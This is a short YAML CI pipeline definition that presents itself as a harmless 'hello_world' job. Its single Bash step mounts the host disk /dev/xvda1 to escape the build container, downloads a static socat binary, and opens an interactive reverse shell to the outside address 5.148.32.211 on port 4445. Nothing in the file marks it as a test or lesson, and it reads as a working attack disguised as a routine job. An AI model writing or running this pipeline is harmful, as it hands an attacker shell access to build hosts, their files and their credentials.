pipelines:
  - name: hello_world
    steps:
      - name: say_hello
        type: Bash
        execution:
          onExecute:
            - uname -a
            - mkdir /mnt/host; 
            - mount /dev/xvda1 /mnt/host/;
            - cd /mnt/host/
            - cd home/ubuntu
            - wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
            - ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:5.148.32.211:4445
